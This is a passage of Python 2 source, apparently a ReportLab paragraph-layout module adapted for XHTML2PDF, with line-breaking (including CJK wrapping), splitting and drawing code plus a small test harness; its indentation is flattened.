inlineFF = fs * 0.125
ys = y0 + 2 * inlineFF
if c != csc:
tx._canvas.setStrokeColor(c)
csc = c
tx._canvas.setLineWidth(inlineFF * 0.75)
tx._canvas.line(x1, ys, x2, ys)
xs.strikes = []
xs.strike = 0
xs.strikeColor = None
yl = y + leading
for x1, x2, link, c in xs.links:
# No automatic underlining for links, never!
_doLink(tx, link, (x1, y, x2, yl))
xs.links = []
xs.link = None
xs.linkColor = None
xs.cur_y -= leading
def textTransformFrags(frags, style):
tt = style.textTransform
if tt:
tt = tt.lower()
if tt == 'lowercase':
tt = unicode.lower
elif tt == 'uppercase':
tt = unicode.upper
elif tt == 'capitalize':
tt = unicode.title
elif tt == 'none':
return
else:
raise ValueError('ParaStyle.textTransform value %r is invalid' % style.textTransform)
n = len(frags)
if n == 1:
#single fragment the easy case
frags[0].text = tt(frags[0].text.decode('utf8')).encode('utf8')
elif tt is unicode.title:
pb = True
for f in frags:
t = f.text
if not t: continue
u = t.decode('utf8')
if u.startswith(u' ') or pb:
u = tt(u)
else:
i = u.find(u' ')
if i >= 0:
u = u[:i] + tt(u[i:])
pb = u.endswith(u' ')
f.text = u.encode('utf8')
else:
for f in frags:
t = f.text
if not t: continue
f.text = tt(t.decode('utf8')).encode('utf8')
class cjkU(unicode):
"""
simple class to hold the frag corresponding to a str
"""
def __new__(cls, value, frag, encoding):
self = unicode.__new__(cls, value)
self._frag = frag
if hasattr(frag, 'cbDefn'):
w = getattr(frag.cbDefn, 'width', 0)
self._width = w
else:
self._width = stringWidth(value, frag.fontName, frag.fontSize)
return self
frag = property(lambda self: self._frag)
width = property(lambda self: self._width)
def makeCJKParaLine(U, extraSpace, calcBounds):
words = []
CW = []
f0 = FragLine()
maxSize = maxAscent = minDescent = 0
for u in U:
f = u.frag
fontSize = f.fontSize
if calcBounds:
cbDefn = getattr(f, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
descent, ascent = imgVRange(cbDefn.height, cbDefn.valign, fontSize)
else:
ascent, descent = getAscentDescent(f.fontName, fontSize)
else:
ascent, descent = getAscentDescent(f.fontName, fontSize)
maxSize = max(maxSize, fontSize)
maxAscent = max(maxAscent, ascent)
minDescent = min(minDescent, descent)
if not _sameFrag(f0, f):
f0 = f0.clone()
f0.text = u''.join(CW)
words.append(f0)
CW = []
f0 = f
CW.append(u)
if CW:
f0 = f0.clone()
f0.text = u''.join(CW)
words.append(f0)
return FragLine(kind=1, extraSpace=extraSpace, wordCount=1, words=words[1:], fontSize=maxSize, ascent=maxAscent,
descent=minDescent)
def cjkFragSplit(frags, maxWidths, calcBounds, encoding='utf8'):
"""
This attempts to be wordSplit for frags using the dumb algorithm
"""
from reportlab.rl_config import _FUZZ
U = [] # get a list of single glyphs with their widths etc etc
for f in frags:
text = f.text
if not isinstance(text, unicode):
text = text.decode(encoding)
if text:
U.extend([cjkU(t, f, encoding) for t in text])
else:
U.append(cjkU(text, f, encoding))
lines = []
widthUsed = lineStartPos = 0
maxWidth = maxWidths[0]
for i, u in enumerate(U):
w = u.width
widthUsed += w
lineBreak = hasattr(u.frag, 'lineBreak')
endLine = (widthUsed > maxWidth + _FUZZ and widthUsed > 0) or lineBreak
if endLine:
if lineBreak: continue
extraSpace = maxWidth - widthUsed + w
#This is the most important of the Japanese typography rules.
#if next character cannot start a line, wrap it up to this line so it hangs
#in the right margin. We won't do two or more though - that's unlikely and
#would result in growing ugliness.
nextChar = U[i]
if nextChar in ALL_CANNOT_START:
extraSpace -= w
i += 1
lines.append(makeCJKParaLine(U[lineStartPos:i], extraSpace, calcBounds))
try:
maxWidth = maxWidths[len(lines)]
except IndexError:
maxWidth = maxWidths[-1] # use the last one
lineStartPos = i
widthUsed = w
i -= 1
#any characters left?
if widthUsed > 0:
lines.append(makeCJKParaLine(U[lineStartPos:], maxWidth - widthUsed, calcBounds))
return ParaLines(kind=1, lines=lines)
class Paragraph(Flowable):
"""
Paragraph(text, style, bulletText=None, caseSensitive=1)
text a string of stuff to go into the paragraph.
style is a style definition as in reportlab.lib.styles.
    bulletText is an optional bullet definition.
caseSensitive set this to 0 if you want the markup tags and their attributes to be case-insensitive.
This class is a flowable that can format a block of text
into a paragraph with a given style.
The paragraph Text can contain XML-like markup including the tags:
<b> ... </b> - bold
<i> ... </i> - italics
<u> ... </u> - underline
<strike> ... </strike> - strike through
<super> ... </super> - superscript
<sub> ... </sub> - subscript
<font name=fontfamily/fontname color=colorname size=float>
<onDraw name=callable label="a label">
<link>link text</link>
attributes of links
size/fontSize=num
name/face/fontName=name
fg/textColor/color=color
backcolor/backColor/bgcolor=color
dest/destination/target/href/link=target
<a>anchor text</a>
attributes of anchors
fontSize=num
fontName=name
fg/textColor/color=color
backcolor/backColor/bgcolor=color
href=href
<a name="anchorpoint"/>
<unichar name="unicode character name"/>
<unichar value="unicode code point"/>
<img src="path" width="1in" height="1in" valign="bottom"/>
The whole may be surrounded by <para> </para> tags
The <b> and <i> tags will work for the built-in fonts (Helvetica
/Times / Courier). For other fonts you need to register a family
of 4 fonts using reportlab.pdfbase.pdfmetrics.registerFont; then
use the addMapping function to tell the library that these 4 fonts
form a family e.g.
from reportlab.lib.fonts import addMapping
addMapping('Vera', 0, 0, 'Vera') #normal
addMapping('Vera', 0, 1, 'Vera-Italic') #italic
addMapping('Vera', 1, 0, 'Vera-Bold') #bold
addMapping('Vera', 1, 1, 'Vera-BoldItalic') #italic and bold
It will also be able to handle any MathML specified Greek characters.
"""
def __init__(self, text, style, bulletText=None, frags=None, caseSensitive=1, encoding='utf8'):
self.caseSensitive = caseSensitive
self.encoding = encoding
self._setup(text, style, bulletText, frags, cleanBlockQuotedText)
def __repr__(self):
n = self.__class__.__name__
L = [n + "("]
keys = self.__dict__.keys()
for k in keys:
v = getattr(self, k)
rk = repr(k)
rv = repr(v)
rk = " " + rk.replace("\n", "\n ")
rv = " " + rk.replace("\n", "\n ")
L.append(rk)
L.append(rv)
L.append(") #" + n)
return '\n'.join(L)
def _setup(self, text, style, bulletText, frags, cleaner):
if frags is None:
text = cleaner(text)
_parser.caseSensitive = self.caseSensitive
style, frags, bulletTextFrags = _parser.parse(text, style)
if frags is None:
raise ValueError("xml parser error (%s) in paragraph beginning\n'%s'" \
% (_parser.errors[0], text[:min(30, len(text))]))
textTransformFrags(frags, style)
if bulletTextFrags: bulletText = bulletTextFrags
#AR hack
self.text = text
self.frags = frags
self.style = style
self.bulletText = bulletText
self.debug = PARAGRAPH_DEBUG # turn this on to see a pretty one with all the margins etc.
def wrap(self, availWidth, availHeight):
if self.debug:
print id(self), "wrap"
try:
print repr(self.getPlainText()[:80])
except:
print "???"
# work out widths array for breaking
self.width = availWidth
style = self.style
leftIndent = style.leftIndent
first_line_width = availWidth - (leftIndent + style.firstLineIndent) - style.rightIndent
later_widths = availWidth - leftIndent - style.rightIndent
if style.wordWrap == 'CJK':
#use Asian text wrap algorithm to break characters
blPara = self.breakLinesCJK([first_line_width, later_widths])
else:
blPara = self.breakLines([first_line_width, later_widths])
self.blPara = blPara
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
leading = style.leading
if blPara.kind == 1 and autoLeading not in ('', 'off'):
height = 0
if autoLeading == 'max':
for l in blPara.lines:
height += max(l.ascent - l.descent, leading)
elif autoLeading == 'min':
for l in blPara.lines:
height += l.ascent - l.descent
else:
raise ValueError('invalid autoLeading value %r' % autoLeading)
else:
if autoLeading == 'max':
leading = max(leading, LEADING_FACTOR * style.fontSize)
elif autoLeading == 'min':
leading = LEADING_FACTOR * style.fontSize
height = len(blPara.lines) * leading
self.height = height
return self.width, height
def minWidth(self):
"""
Attempt to determine a minimum sensible width
"""
frags = self.frags
nFrags = len(frags)
if not nFrags: return 0
if nFrags == 1:
f = frags[0]
fS = f.fontSize
fN = f.fontName
words = hasattr(f, 'text') and split(f.text, ' ') or f.words
func = lambda w, fS=fS, fN=fN: stringWidth(w, fN, fS)
else:
words = _getFragWords(frags)
func = lambda x: x[0]
return max(map(func, words))
def _get_split_blParaFunc(self):
return self.blPara.kind == 0 and _split_blParaSimple or _split_blParaHard
def split(self, availWidth, availHeight):
if self.debug:
print id(self), "split"
if len(self.frags) <= 0: return []
#the split information is all inside self.blPara
if not hasattr(self, 'blPara'):
self.wrap(availWidth, availHeight)
blPara = self.blPara
style = self.style
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
leading = style.leading
lines = blPara.lines
if blPara.kind == 1 and autoLeading not in ('', 'off'):
s = height = 0
if autoLeading == 'max':
for i, l in enumerate(blPara.lines):
h = max(l.ascent - l.descent, leading)
n = height + h
if n > availHeight + 1e-8:
break
height = n
s = i + 1
elif autoLeading == 'min':
for i, l in enumerate(blPara.lines):
n = height + l.ascent - l.descent
if n > availHeight + 1e-8:
break
height = n
s = i + 1
else:
raise ValueError('invalid autoLeading value %r' % autoLeading)
else:
l = leading
if autoLeading == 'max':
l = max(leading, LEADING_FACTOR * style.fontSize)
elif autoLeading == 'min':
l = LEADING_FACTOR * style.fontSize
s = int(availHeight / l)
height = s * l
n = len(lines)
        allowWidows = getattr(self, 'allowWidows', getattr(style, 'allowWidows', 1))
        allowOrphans = getattr(self, 'allowOrphans', getattr(style, 'allowOrphans', 0))
if not allowOrphans:
if s <= 1: # orphan?
del self.blPara
return []
if n <= s: return [self]
if not allowWidows:
if n == s + 1: # widow?
if (allowOrphans and n == 3) or n > 3:
s -= 1 # give the widow some company
else:
del self.blPara # no room for adjustment; force the whole para onwards
return []
func = self._get_split_blParaFunc()
P1 = self.__class__(None, style, bulletText=self.bulletText, frags=func(blPara, 0, s))
#this is a major hack
P1.blPara = ParaLines(kind=1, lines=blPara.lines[0:s], aH=availHeight, aW=availWidth)
P1._JustifyLast = 1
P1._splitpara = 1
P1.height = height
P1.width = availWidth
if style.firstLineIndent != 0:
style = deepcopy(style)
style.firstLineIndent = 0
P2 = self.__class__(None, style, bulletText=None, frags=func(blPara, s, n))
for a in ('autoLeading', # possible attributes that might be directly on self.
):
if hasattr(self, a):
setattr(P1, a, getattr(self, a))
setattr(P2, a, getattr(self, a))
return [P1, P2]
def draw(self):
#call another method for historical reasons. Besides, I
#suspect I will be playing with alternate drawing routines
#so not doing it here makes it easier to switch.
self.drawPara(self.debug)
def breakLines(self, width):
"""
Returns a broken line structure. There are two cases
A) For the simple case of a single formatting input fragment the output is
A fragment specifier with
- kind = 0
- fontName, fontSize, leading, textColor
- lines= A list of lines
Each line has two items.
1. unused width in points
2. word list
B) When there is more than one input formatting fragment the output is
A fragment specifier with
- kind = 1
- lines= A list of fragments each having fields
- extraspace (needed for justified)
- fontSize
- words=word list
each word is itself a fragment with
various settings
This structure can be used to easily draw paragraphs with the various alignments.
You can supply either a single width or a list of widths; the latter will have its
last item repeated until necessary. A 2-element list is useful when there is a
different first line indent; a longer list could be created to facilitate custom wraps
around irregular objects.
"""
if self.debug:
print id(self), "breakLines"
if not isinstance(width, (tuple, list)):
maxWidths = [width]
else:
maxWidths = width
lines = []
lineno = 0
style = self.style
#for bullets, work out width and ensure we wrap the right amount onto line one
_handleBulletWidth(self.bulletText, style, maxWidths)
maxWidth = maxWidths[0]
self.height = 0
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
calcBounds = autoLeading not in ('', 'off')
frags = self.frags
nFrags = len(frags)
if nFrags == 1 and not hasattr(frags[0], 'cbDefn'):
f = frags[0]
fontSize = f.fontSize
fontName = f.fontName
ascent, descent = getAscentDescent(fontName, fontSize)
words = hasattr(f, 'text') and split(f.text, ' ') or f.words
spaceWidth = stringWidth(' ', fontName, fontSize, self.encoding)
cLine = []
currentWidth = -spaceWidth # hack to get around extra space for word 1
for word in words:
#this underscores my feeling that Unicode throughout would be easier!
wordWidth = stringWidth(word, fontName, fontSize, self.encoding)
newWidth = currentWidth + spaceWidth + wordWidth
if newWidth <= maxWidth or not len(cLine):
# fit one more on this line
cLine.append(word)
currentWidth = newWidth
else:
if currentWidth > self.width: self.width = currentWidth
#end of line
lines.append((maxWidth - currentWidth, cLine))
cLine = [word]
currentWidth = wordWidth
lineno += 1
try:
maxWidth = maxWidths[lineno]
except IndexError:
maxWidth = maxWidths[-1] # use the last one
#deal with any leftovers on the final line
if cLine != []:
if currentWidth > self.width: self.width = currentWidth
lines.append((maxWidth - currentWidth, cLine))
return f.clone(kind=0, lines=lines, ascent=ascent, descent=descent, fontSize=fontSize)
elif nFrags <= 0:
return ParaLines(kind=0, fontSize=style.fontSize, fontName=style.fontName,
textColor=style.textColor, ascent=style.fontSize, descent=-0.2 * style.fontSize,
lines=[])
else:
if hasattr(self, 'blPara') and getattr(self, '_splitpara', 0):
#NB this is an utter hack that awaits the proper information
#preserving splitting algorithm
return self.blPara
n = 0
words = []
for w in _getFragWords(frags):
f = w[-1][0]
fontName = f.fontName
fontSize = f.fontSize
spaceWidth = stringWidth(' ', fontName, fontSize)
if not words:
currentWidth = -spaceWidth # hack to get around extra space for word 1
maxSize = fontSize
maxAscent, minDescent = getAscentDescent(fontName, fontSize)
wordWidth = w[0]
f = w[1][0]
if wordWidth > 0:
newWidth = currentWidth + spaceWidth + wordWidth
else:
newWidth = currentWidth
#test to see if this frag is a line break. If it is we will only act on it
#if the current width is non-negative or the previous thing was a deliberate lineBreak
lineBreak = hasattr(f, 'lineBreak')
endLine = (newWidth > maxWidth and n > 0) or lineBreak
if not endLine:
if lineBreak: continue #throw it away
nText = w[1][1]
if nText: n += 1
fontSize = f.fontSize
if calcBounds:
cbDefn = getattr(f, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
descent, ascent = imgVRange(cbDefn.height, cbDefn.valign, fontSize)
else:
ascent, descent = getAscentDescent(f.fontName, fontSize)
else:
ascent, descent = getAscentDescent(f.fontName, fontSize)
maxSize = max(maxSize, fontSize)
maxAscent = max(maxAscent, ascent)
minDescent = min(minDescent, descent)
if not words:
g = f.clone()
words = [g]
g.text = nText
elif not _sameFrag(g, f):
if currentWidth > 0 and ((nText != '' and nText[0] != ' ') or hasattr(f, 'cbDefn')):
if hasattr(g, 'cbDefn'):
i = len(words) - 1
while i >= 0:
wi = words[i]
cbDefn = getattr(wi, 'cbDefn', None)
if cbDefn:
if not getattr(cbDefn, 'width', 0):
i -= 1
continue
if not wi.text.endswith(' '):
wi.text += ' '
break
else:
if not g.text.endswith(' '):
g.text += ' '
g = f.clone()
words.append(g)
g.text = nText
else:
if nText != '' and nText[0] != ' ':
g.text += ' ' + nText
for i in w[2:]:
g = i[0].clone()
g.text = i[1]
words.append(g)
fontSize = g.fontSize
if calcBounds:
cbDefn = getattr(g, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
descent, ascent = imgVRange(cbDefn.height, cbDefn.valign, fontSize)
else:
ascent, descent = getAscentDescent(g.fontName, fontSize)
else:
ascent, descent = getAscentDescent(g.fontName, fontSize)
maxSize = max(maxSize, fontSize)
maxAscent = max(maxAscent, ascent)
minDescent = min(minDescent, descent)
currentWidth = newWidth
else: # either it won't fit, or it's a lineBreak tag
if lineBreak:
g = f.clone()
words.append(g)
if currentWidth > self.width: self.width = currentWidth
#end of line
lines.append(FragLine(extraSpace=maxWidth - currentWidth, wordCount=n,
lineBreak=lineBreak, words=words, fontSize=maxSize, ascent=maxAscent,
descent=minDescent))
#start new line
lineno += 1
try:
maxWidth = maxWidths[lineno]
except IndexError:
maxWidth = maxWidths[-1] # use the last one
if lineBreak:
n = 0
words = []
continue
currentWidth = wordWidth
n = 1
g = f.clone()
maxSize = g.fontSize
if calcBounds:
cbDefn = getattr(g, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
minDescent, maxAscent = imgVRange(cbDefn.height, cbDefn.valign, maxSize)
else:
maxAscent, minDescent = getAscentDescent(g.fontName, maxSize)
else:
maxAscent, minDescent = getAscentDescent(g.fontName, maxSize)
words = [g]
g.text = w[1][1]
for i in w[2:]:
g = i[0].clone()
g.text = i[1]
words.append(g)
fontSize = g.fontSize
if calcBounds:
cbDefn = getattr(g, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
descent, ascent = imgVRange(cbDefn.height, cbDefn.valign, fontSize)
else:
ascent, descent = getAscentDescent(g.fontName, fontSize)
else:
ascent, descent = getAscentDescent(g.fontName, fontSize)
maxSize = max(maxSize, fontSize)
maxAscent = max(maxAscent, ascent)
minDescent = min(minDescent, descent)
#deal with any leftovers on the final line
if words != []:
if currentWidth > self.width: self.width = currentWidth
lines.append(ParaLines(extraSpace=(maxWidth - currentWidth), wordCount=n,
words=words, fontSize=maxSize, ascent=maxAscent, descent=minDescent))
return ParaLines(kind=1, lines=lines)
return lines
def breakLinesCJK(self, width):
"""Initially, the dumbest possible wrapping algorithm.
Cannot handle font variations."""
if self.debug:
print id(self), "breakLinesCJK"
if not isinstance(width, (list, tuple)):
maxWidths = [width]
else:
maxWidths = width
style = self.style
#for bullets, work out width and ensure we wrap the right amount onto line one
_handleBulletWidth(self.bulletText, style, maxWidths)
if len(self.frags) > 1:
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
calcBounds = autoLeading not in ('', 'off')
return cjkFragSplit(self.frags, maxWidths, calcBounds, self.encoding)
elif not len(self.frags):
return ParaLines(kind=0, fontSize=style.fontSize, fontName=style.fontName,
textColor=style.textColor, lines=[], ascent=style.fontSize, descent=-0.2 * style.fontSize)
f = self.frags[0]
if 1 and hasattr(self, 'blPara') and getattr(self, '_splitpara', 0):
#NB this is an utter hack that awaits the proper information
#preserving splitting algorithm
return f.clone(kind=0, lines=self.blPara.lines)
lines = []
lineno = 0
self.height = 0
f = self.frags[0]
if hasattr(f, 'text'):
text = f.text
else:
text = ''.join(getattr(f, 'words', []))
from reportlab.lib.textsplit import wordSplit
lines = wordSplit(text, maxWidths[0], f.fontName, f.fontSize)
#the paragraph drawing routine assumes multiple frags per line, so we need an
#extra list like this
# [space, [text]]
#
wrappedLines = [(sp, [line]) for (sp, line) in lines]
return f.clone(kind=0, lines=wrappedLines, ascent=f.fontSize, descent=-0.2 * f.fontSize)
def beginText(self, x, y):
return self.canv.beginText(x, y)
def drawPara(self, debug=0):
"""Draws a paragraph according to the given style.
Returns the final y position at the bottom. Not safe for
paragraphs without spaces e.g. Japanese; wrapping
algorithm will go infinite."""
if self.debug:
print id(self), "drawPara", self.blPara.kind
#stash the key facts locally for speed
canvas = self.canv
style = self.style
blPara = self.blPara
lines = blPara.lines
leading = style.leading
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
#work out the origin for line 1
leftIndent = style.leftIndent
cur_x = leftIndent
if debug:
bw = 0.5
bc = Color(1, 1, 0)
bg = Color(0.9, 0.9, 0.9)
else:
bw = getattr(style, 'borderWidth', None)
bc = getattr(style, 'borderColor', None)
bg = style.backColor
#if has a background or border, draw it
if bg or (bc and bw):
canvas.saveState()
op = canvas.rect
kwds = dict(fill=0, stroke=0)
if bc and bw:
canvas.setStrokeColor(bc)
canvas.setLineWidth(bw)
kwds['stroke'] = 1
br = getattr(style, 'borderRadius', 0)
if br and not debug:
op = canvas.roundRect
kwds['radius'] = br
if bg:
canvas.setFillColor(bg)
kwds['fill'] = 1
bp = getattr(style, 'borderPadding', 0)
op(leftIndent - bp,
-bp,
self.width - (leftIndent + style.rightIndent) + 2 * bp,
self.height + 2 * bp,
**kwds)
canvas.restoreState()
nLines = len(lines)
bulletText = self.bulletText
if nLines > 0:
_offsets = getattr(self, '_offsets', [0])
_offsets += (nLines - len(_offsets)) * [_offsets[-1]]
canvas.saveState()
alignment = style.alignment
offset = style.firstLineIndent + _offsets[0]
lim = nLines - 1
noJustifyLast = not (hasattr(self, '_JustifyLast') and self._JustifyLast)
if blPara.kind == 0:
if alignment == TA_LEFT:
dpl = _leftDrawParaLine
elif alignment == TA_CENTER:
dpl = _centerDrawParaLine
elif self.style.alignment == TA_RIGHT:
dpl = _rightDrawParaLine
elif self.style.alignment == TA_JUSTIFY:
dpl = _justifyDrawParaLine
f = blPara
cur_y = self.height - getattr(f, 'ascent', f.fontSize) # TODO fix XPreformatted to remove this hack
if bulletText:
offset = _drawBullet(canvas, offset, cur_y, bulletText, style)
#set up the font etc.
canvas.setFillColor(f.textColor)
tx = self.beginText(cur_x, cur_y)
if autoLeading == 'max':
leading = max(leading, LEADING_FACTOR * f.fontSize)
elif autoLeading == 'min':
leading = LEADING_FACTOR * f.fontSize
#now the font for the rest of the paragraph
tx.setFont(f.fontName, f.fontSize, leading)
ws = getattr(tx, '_wordSpace', 0)
t_off = dpl(tx, offset, ws, lines[0][1], noJustifyLast and nLines == 1)
if f.underline or f.link or f.strike:
xs = tx.XtraState = ABag()
xs.cur_y = cur_y
xs.f = f
xs.style = style
xs.lines = lines
xs.underlines = []
xs.underlineColor = None
# XXX Modified for XHTML2PDF
xs.backgrounds = []
xs.backgroundColor = None
xs.backgroundFontSize = None
xs.strikes = []
xs.strikeColor = None
# XXX Modified for XHTML2PDF
xs.strikeFontSize = None
xs.links = []
xs.link = f.link
canvas.setStrokeColor(f.textColor)
dx = t_off + leftIndent
if dpl != _justifyDrawParaLine: ws = 0
# XXX Never underline!
underline = f.underline
strike = f.strike
link = f.link
if underline:
_do_under_line(0, dx, ws, tx)
if strike:
_do_under_line(0, dx, ws, tx, lm=0.125)
if link: _do_link_line(0, dx, ws, tx)
#now the middle of the paragraph, aligned with the left margin which is our origin.
for i in xrange(1, nLines):
ws = lines[i][0]
t_off = dpl(tx, _offsets[i], ws, lines[i][1], noJustifyLast and i == lim)
if dpl != _justifyDrawParaLine: ws = 0
if underline: _do_under_line(i, t_off + leftIndent, ws, tx)
if strike: _do_under_line(i, t_off + leftIndent, ws, tx, lm=0.125)
if link: _do_link_line(i, t_off + leftIndent, ws, tx)
else:
for i in xrange(1, nLines):
dpl(tx, _offsets[i], lines[i][0], lines[i][1], noJustifyLast and i == lim)
else:
f = lines[0]
cur_y = self.height - getattr(f, 'ascent', f.fontSize) # TODO fix XPreformatted to remove this hack
# default?
dpl = _leftDrawParaLineX
if bulletText:
oo = offset
offset = _drawBullet(canvas, offset, cur_y, bulletText, style)
if alignment == TA_LEFT:
dpl = _leftDrawParaLineX
elif alignment == TA_CENTER:
dpl = _centerDrawParaLineX
elif self.style.alignment == TA_RIGHT:
dpl = _rightDrawParaLineX
elif self.style.alignment == TA_JUSTIFY:
dpl = _justifyDrawParaLineX
else:
raise ValueError("bad align %s" % repr(alignment))
#set up the font etc.
tx = self.beginText(cur_x, cur_y)
xs = tx.XtraState = ABag()
xs.textColor = None
# XXX Modified for XHTML2PDF
xs.backColor = None
xs.rise = 0
xs.underline = 0
xs.underlines = []
xs.underlineColor = None
# XXX Modified for XHTML2PDF
xs.background = 0
xs.backgrounds = []
xs.backgroundColor = None
xs.backgroundFontSize = None
xs.strike = 0
xs.strikes = []
xs.strikeColor = None
# XXX Modified for XHTML2PDF
xs.strikeFontSize = None
xs.links = []
xs.link = None
xs.leading = style.leading
xs.leftIndent = leftIndent
tx._leading = None
tx._olb = None
xs.cur_y = cur_y
xs.f = f
xs.style = style
xs.autoLeading = autoLeading
tx._fontname, tx._fontsize = None, None
dpl(tx, offset, lines[0], noJustifyLast and nLines == 1)
_do_post_text(tx)
#now the middle of the paragraph, aligned with the left margin which is our origin.
for i in xrange(1, nLines):
f = lines[i]
dpl(tx, _offsets[i], f, noJustifyLast and i == lim)
_do_post_text(tx)
canvas.drawText(tx)
canvas.restoreState()
def getPlainText(self, identify=None):
"""
Convenience function for templates which want access
to the raw text, without XML tags.
"""
frags = getattr(self, 'frags', None)
if frags:
plains = []
for frag in frags:
if hasattr(frag, 'text'):
plains.append(frag.text)
return join(plains, '')
elif identify:
text = getattr(self, 'text', None)
if text is None: text = repr(self)
return text
else:
return ''
def getActualLineWidths0(self):
"""
Convenience function; tells you how wide each line
actually is. For justified styles, this will be
the same as the wrap width; for others it might be
useful for seeing if paragraphs will fit in spaces.
"""
assert hasattr(self, 'width'), "Cannot call this method before wrap()"
if self.blPara.kind:
func = lambda frag, w=self.width: w - frag.extraSpace
else:
func = lambda frag, w=self.width: w - frag[0]
return map(func, self.blPara.lines)
if __name__ == '__main__': # NORUNTESTS
def dumpParagraphLines(P):
print 'dumpParagraphLines(<Paragraph @ %d>)' % id(P)
lines = P.blPara.lines
for l, line in enumerate(lines):
line = lines[l]
if hasattr(line, 'words'):
words = line.words
else:
words = line[1]
nwords = len(words)
print 'line%d: %d(%s)\n ' % (l, nwords, str(getattr(line, 'wordCount', 'Unknown'))),
for w in xrange(nwords):
print "%d:'%s'" % (w, getattr(words[w], 'text', words[w])),
print
def fragDump(w):
R = ["'%s'" % w[1]]
for a in ('fontName', 'fontSize', 'textColor', 'rise', 'underline', 'strike', 'link', 'cbDefn', 'lineBreak'):
if hasattr(w[0], a):
R.append('%s=%r' % (a, getattr(w[0], a)))
return ', '.join(R)
def dumpParagraphFrags(P):
print 'dumpParagraphFrags(<Paragraph @ %d>) minWidth() = %.2f' % (id(P), P.minWidth())
frags = P.frags
n = len(frags)
for l in xrange(n):
print "frag%d: '%s' %s" % (
                l, frags[l].text, ' '.join(['%s=%s' % (k, getattr(frags[l], k)) for k in frags[l].__dict__ if k != 'text']))
l = 0
cum = 0
for W in _getFragWords(frags):
cum += W[0]
print "fragword%d: cum=%3d size=%d" % (l, cum, W[0]),
for w in W[1:]:
print '(%s)' % fragDump(w),
print
l += 1
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
from reportlab.lib.units import cm
import sys
TESTS = sys.argv[1:]
if TESTS == []:
TESTS = ['4']
def flagged(i, TESTS=TESTS):
return 'all' in TESTS or '*' in TESTS or str(i) in TESTS
styleSheet = getSampleStyleSheet()
B = styleSheet['BodyText']
style = ParagraphStyle("discussiontext", parent=B)
style.fontName = 'Helvetica'
if flagged(1):
text = '''The <font name=courier color=green>CMYK</font> or subtractive method follows the way a printer
mixes three pigments (cyan, magenta, and yellow) to form colors.
Because mixing chemicals is more difficult than combining light there
is a fourth parameter for darkness. For example a chemical
combination of the <font name=courier color=green>CMY</font> pigments generally never makes a perfect
black -- instead producing a muddy color -- so, to get black printers
don't use the <font name=courier color=green>CMY</font> pigments but use a direct black ink. Because
<font name=courier color=green>CMYK</font> maps more directly to the way printer hardware works it may
be the case that &| & | colors specified in <font name=courier color=green>CMYK</font> will provide better fidelity
and better control when printed.
'''
P = Paragraph(text, style)
dumpParagraphFrags(P)
aW, aH = 456.0, 42.8
w, h = P.wrap(aW, aH)
dumpParagraphLines(P)
S = P.split(aW, aH)
for s in S:
s.wrap(aW, aH)
dumpParagraphLines(s)
aH = 500
if flagged(2):
P = Paragraph("""Price<super><font color="red">*</font></super>""", styleSheet['Normal'])
dumpParagraphFrags(P)
w, h = P.wrap(24, 200)
dumpParagraphLines(P)
if flagged(3):
text = """Dieses Kapitel bietet eine schnelle <b><font color=red>Programme :: starten</font></b>
<onDraw name=myIndex label="Programme :: starten">
<b><font color=red>Eingabeaufforderung :: (>>>)</font></b>
<onDraw name=myIndex label="Eingabeaufforderung :: (>>>)">
<b><font color=red>>>> (Eingabeaufforderung)</font></b>
<onDraw name=myIndex label=">>> (Eingabeaufforderung)">
Einführung in Python <b><font color=red>Python :: Einführung</font></b>
<onDraw name=myIndex label="Python :: Einführung">.
Das Ziel ist, die grundlegenden Eigenschaften von Python darzustellen, ohne
sich zu sehr in speziellen Regeln oder Details zu verstricken. Dazu behandelt
dieses Kapitel kurz die wesentlichen Konzepte wie Variablen, Ausdrücke,
Kontrollfluss, Funktionen sowie Ein- und Ausgabe. Es erhebt nicht den Anspruch,
umfassend zu sein."""
P = Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
if flagged(4):
text = '''Die eingebaute Funktion <font name=Courier>range(i, j [, stride])</font><onDraw name=myIndex label="eingebaute Funktionen::range()"><onDraw name=myIndex label="range() (Funktion)"><onDraw name=myIndex label="Funktionen::range()"> erzeugt eine Liste von Ganzzahlen und füllt sie mit Werten <font name=Courier>k</font>, für die gilt: <font name=Courier>i <= k < j</font>. Man kann auch eine optionale Schrittweite angeben. Die eingebaute Funktion <font name=Courier>xrange()</font><onDraw name=myIndex label="eingebaute Funktionen::xrange()"><onDraw name=myIndex label="xrange() (Funktion)"><onDraw name=myIndex label="Funktionen::xrange()"> erfüllt einen ähnlichen Zweck, gibt aber eine unveränderliche Sequenz vom Typ <font name=Courier>XRangeType</font><onDraw name=myIndex label="XRangeType"> zurück. Anstatt alle Werte in der Liste abzuspeichern, berechnet diese Liste ihre Werte, wann immer sie angefordert werden. Das ist sehr viel speicherschonender, wenn mit sehr langen Listen von Ganzzahlen gearbeitet wird. <font name=Courier>XRangeType</font> kennt eine einzige Methode, <font name=Courier>s.tolist()</font><onDraw name=myIndex label="XRangeType::tolist() (Methode)"><onDraw name=myIndex label="s.tolist() (Methode)"><onDraw name=myIndex label="Methoden::s.tolist()">, die seine Werte in eine Liste umwandelt.'''
aW = 420
aH = 64.4
P = Paragraph(text, B)
dumpParagraphFrags(P)
w, h = P.wrap(aW, aH)
print 'After initial wrap', w, h
dumpParagraphLines(P)
S = P.split(aW, aH)
dumpParagraphFrags(S[0])
w0, h0 = S[0].wrap(aW, aH)
print 'After split wrap', w0, h0
dumpParagraphLines(S[0])
if flagged(5):
text = '<para> %s <![CDATA[</font></b>& %s < >]]></para>' % (chr(163), chr(163))
P = Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
if flagged(6):
for text in [
'''Here comes <FONT FACE="Helvetica" SIZE="14pt">Helvetica 14</FONT> with <STRONG>strong</STRONG> <EM>emphasis</EM>.''',
